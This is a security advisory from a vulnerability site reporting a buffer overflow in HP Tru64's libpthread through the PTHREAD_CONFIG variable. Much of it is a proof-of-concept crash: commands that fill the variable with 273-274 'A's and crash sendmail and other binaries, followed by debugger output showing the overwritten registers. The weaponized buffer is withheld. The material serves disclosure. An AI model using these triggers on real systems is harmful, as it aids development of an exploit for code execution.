Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	HP Tru64 libpthread Buffer Overflow 14 Nov. 2006    Summary The pthread library (libpthread) provides "interfaces for developing multi-threaded applications". libpthread suffers from a buffer overflow vulnerability which may enable an attacker to execute arbitrary commands on the system. This vulnerability may potentially be exploited by a creating a specially crafted buffer and inserting it into the PTHREAD_CONFIG variable.   Credit: The information has been provided by Netragard Security Advisories. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * libpthread version 5.1b (HPUX) libpthread reads in the PTHREAD_CONFIG environment variable. It may be possible to exploit libpthread on HP's tru64 by creating a specially crafted buffer. The details below do not contain the specially crafted buffer. Exploitation of this specific vulnerability is very difficult. ############################################# # # Insert 273 A's (41) into the PTHREAD_CONFIG variable # ############################################# OSF1 tru64 V5.1 2650 alpha bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 273'` bash-3.00# newaliases Segmentation fault (core dumped) ############################################# # # Insert 274 A's (41) into the PTHREAD_CONFIG variable # ############################################# bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 274'` bash-3.00# newaliases Unaligned access pid=15750 <newaliases> va=0x11fff00a4 pc=0x3ff805c8bf8 ra=0x3ff805c8bf8 inst=0xa4290040 Unaligned access pid=15750 <newaliases> va=0x11fff00bc pc=0x3ff805c8bfc ra=0x3ff805c8bf8 inst=0xa4490058 Unaligned access pid=15750 <newaliases> va=0x11fff008c pc=0x3ff805c8c48 ra=0x3ff805c8bf8 inst=0xa5090028 ############################################# # # Run newaliases in gdb with the -q flag. # ############################################# bash-3.00# gdb /tmp/newaliases -q (no debugging symbols found)...(gdb) r Starting program: /tmp/newaliases (no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so ############################################# # # Execute a back trace (bt) within gdb # ############################################# (gdb) bt #0 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so #1 0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so #2 0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x4141414141414141 This warning occurs if you are debugging a function without any symbols (for example, in a stripped executable). In that case, you may wish to increase the size of the search with the `set heuristic-fence-post' command. Otherwise, you told GDB there was a function where there isn't one, or (more likely) you have encountered a bug in GDB. # # Execute Info Registers within gdb # (gdb) i r v0 0x226 550 t0 0x11fff9b3e 4831812414 t1 0x0 0 t2 0x2 2 t3 0x0 0 t4 0x3ffc0081a00 4396973300224 t5 0x40 64 t6 0x7fffffe6 2147483622 t7 0x19 25 s0 0x4141414141414141 4702111234474983745 s1 0x11fff9c90 4831812752 s2 0x11fff9c88 4831812744 s3 0x0 0 s4 0x0 0 s5 0x11fff9ad8 4831812312 fp 0x1 1 a0 0xbf 191 a1 0x11fff9918 4831811864 a2 0x11fff96b0 4831811248 a3 0x11fff9b34 4831812404 a4 0x0 0 a5 0x11fff9b30 4831812400 t8 0x11fff9931 4831811889 t9 0x62 98 t10 0x49 73 t11 0x1 1 ra 0x3ff805c8bf8 4395905092600 t12 0x3ff801c1380 4395900867456 at 0x41416469 1094804585 gp 0x3ffc01c0170 4396974604656 sp 0x11fff98b0 4831811760 zero 0x0 0 fpcr 0x0 0 pc 0x3ff805c8bf8 4395905092600 vfp 0x11fff9900 4831811840 frame 2 v0 0x226 550 t0 0x11fff9b3e 4831812414 t1 0x0 0 t2 0x2 2 t3 0x0 0 t4 0x3ffc0081a00 4396973300224 t5 0x11fff9a50 4831812176 t6 0x7fffffe6 2147483622 t7 0x19 25 s0 0x1 1 s1 0x11fff9c90 4831812752 s2 0x11fff9c88 4831812744 s3 0x0 0 s4 0x0 0 s5 0x11fff9ad8 4831812312 fp 0x1 1 ############################################### # # The following registers, a0, a1, a2, a3, a4, a5, have been # overwritten with A's (0x41). # ############################################### a0 0x4141414141414141 4702111234474983745 a1 0x4141414141414141 4702111234474983745 a2 0x4141414141414141 4702111234474983745 a3 0x4141414141414141 4702111234474983745 a4 0x4141414141414141 4702111234474983745 a5 0x4141414141414141 4702111234474983745 t8 0x11fff9931 4831811889 t9 0x62 98 t10 0x49 73 t11 0x1 1 ra 0x3ff805bc4f8 4395905041656 t12 0x3ff801c1380 4395900867456 at 0x41416469 1094804585 gp 0x3ffc01c0170 4396974604656 sp 0x11fff9a80 4831812224 zero 0x0 0 fpcr 0x0 0 pc 0x3ff805bc4f8 4395905041656 ############################################ # # Other binaries which are linked agianst libpthread.so # will also segfault when the PTHREAD_CONFIG variable # is set to a large string of A's. The following is # a list of some of those binaries # ############################################ /usr/sbin/mailq /usr/sbin/sendmail /usr/sbin/sendmail.v8.11.1 /usr/sbin/smtpd /usr/sbin/collect /usr/dt/bin/mailcv ############################################ # # Sendmail Example. Loading sendmail core file with # the tru64 debugger. # ############################################ bash-3.00# dbx ./sendmail core dbx version 5.1 Type 'help' for help. Core file created by program "sendmail" warning: ./sendmail has no symbol table -- very little is supported without it signal Segmentation fault at >*[__putString, 0x3ff805c8bf8] ldq t0, 64(s0) (dbx) where > 0 __putString(0x0, 0x0, 0x11fffbad8, 0x1, 0x11fffb918) [0x3ff805c8bf8] 1 __putFormatEol(0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141) [0x3ff805c8a74] 2 __utlOptManage(0x30002800000, 0x26000, 0x3ff805c09c4, 0x3ffc01b8098, 0x3ff805c0a14) [0x3ff805bc4f4] ################################################ # # Older versions are also vulnerable... # ################################################ Older versions are also vulnerable... tru64.netragard> uname -a OSF1 tru64.netragard V5.0 910 alpha tru64.netragard> PTHREAD_CONFIG=`perl -e 'print "A"x 272'` tru64.netragard> export PTHREAD_CONFIG tru64.netragard> /usr/dt/bin/mailcv %PTHREAD_CONFIG keyword "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA" is not valid Memory fault Other binareis on 5.0 /usr/bin/ladebug  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability Insight Control for Linux Multiple Vulnerabilities HP-UX Running NFS/ONCplus Denial of Service Vulnerability HP-UX Running BIND Denial of Service Vulnerability 2011 HP-UX Running XNTP Denial of Service Vulnerability HP-UX Denial of Service Vulnerability Webkit Detached Body Element Code Execution Vulnerability Mac OS X Compact Font Format Decoder Code Execution Vulnerability WebKit WBR Tag Removal Code Execution Vulnerability Webkit Undefined DOM Prototype Attach Code Execution Vulnerability Apple HFS Information Disclosure Vulnerability XPDF arbitrary Arbitrary Code Execution Vulnerabilities Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®